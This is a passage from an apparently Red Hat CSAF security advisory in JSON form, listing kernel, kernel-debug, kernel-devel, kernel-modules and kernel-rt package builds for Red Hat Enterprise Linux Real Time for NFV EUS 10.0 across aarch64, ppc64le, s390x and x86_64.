"name": "kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-doc-0:6.12.0-55.69.1.el10_0.noarch as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch"
},
"product_reference": "kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
